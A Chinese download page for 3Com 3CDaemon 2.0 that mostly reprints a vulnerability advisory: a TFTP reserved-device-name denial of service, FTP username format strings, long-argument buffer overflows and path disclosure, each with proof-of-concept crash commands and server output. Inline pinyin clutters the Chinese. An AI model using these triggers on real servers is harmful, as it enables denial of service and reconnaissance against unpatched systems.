- 軟件大小:243.00M
- 軟件(jiàn)語言:中文
- 軟件類型:漢化軟件
- 軟件類別:免費軟件 / FTP 工具
- 更新時間:2018-08-29 16:11
- 運行(háng)環境:WinAll, WinXP
- 軟件等級:
- 軟件廠商:
- 官方網站:http://www.ynaad.com/
頂好評:50%
踩壞評:50
網友評分:8 
220KB/中(zhōng)文(wén)/5.0
435KB/中文/10.0
645KB/中(zhōng)文/10.0
715KB/中文/10.0
13.84M/中文/3.3
3COM 3CDaemon是一款多重服務器功能集成軟(ruǎn)件,主要作用於服務器中,同時(shí)還能夠幫助用戶改善相關的電腦功能,需要的(de)用戶快來(lái)綠(lǜ)色資(zī)源網下載吧!
3com的這款東西還是很有(yǒu)名很不(bú)錯滴~~~3CDaemon是一款免費的集(jí)成了TFTP、FTP和SYSLOG功能的應(yīng)用程(chéng)序;作用於(yú)FTP,TFTP,SYSLOG服務器,TFTP客戶端,雖然還存在很多的問題,但是使用起來還是不錯的!
1、TFTP保留設備名拒絕服務攻擊
提交(jiāo)類似如下(xià)的請求,可導(dǎo)致TFTP服務程序掛起:
D:\WINDOWS\system32>tftp -i 192.168.0.1 get prn
The 3CDaemon will be crashed with some msgs like
"Microsoft Visual C++ Runtime library"
"Runtime Error!"
"Program : C:\Program Files\3Com\3CDaemon\3CDaemon.exe "
"abnormal program termination".
2、FTP用戶名存在格式串問題
提交包含格式串字(zì)符(fú)作為用戶名數據,可導(dǎo)致守護程(chéng)序崩潰:
H:\>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)): %n
Connection closed by remote host.
OR:
H:\>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)): %s
331 User name ok, need password
Password:[anythinghere]
530 Login access denied
Login failed.
ftp>
3、FTP超長用戶名緩(huǎn)衝(chōng)區溢出
由於對用(yòng)戶名缺少正確邊界(jiè)緩衝區檢查,提(tí)交超長用戶名可導致緩衝區溢出:
D:\WINDOWS\system32>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)):
501 Invalid or missing parameters
Login failed.
ftp> user AAA..[about 241 A here]...AAAAA
Connection closed by remote host.
4、多個FTP命令超長參數緩(huǎn)衝區(qū)溢出
cd,send,ls,,put,delete,rename,rmdir,literal,stat,CWD等FTP命令對參數缺少(shǎo)充分邊界檢查,提交(jiāo)超長字符串作為命令參數(shù)可導致緩衝(chōng)區溢出:
ftp> cd AAA..[about 398 A here]...AAAAA
Connection closed by remote host.
ftp>
ftp> ls AAA..[about 247 A here]...AAAAA
200 PORT command successful.
Connection closed by remote host.
ftp> put 1.txt AAA..[about 247 A here]...AAAAA
200 PORT command successful.
532 Need account for storing files
Connection closed by remote host.
5、多個FTP命令存在格式串問題
提交格式字符串作為參數(shù),可導致程序崩潰。
6、多個(gè)FTP命令包設備名信息泄露問(wèn)題
請求保留設備名可導致返回程序安裝(zhuāng)路徑(jìng)信息:
ftp> cd aux
550 aux : C:/3cdaemon/aux is not a directory!
ftp> cd lpt1
550 lpt1 : C:/3cdaemon/lpt1 is not a directory!
受影響係統:
3Com 3CDaemon 2.0 revision 10
請描述您所遇到的錯誤,我們將盡快予以修(xiū)正,謝謝!
*必填項,請輸入內容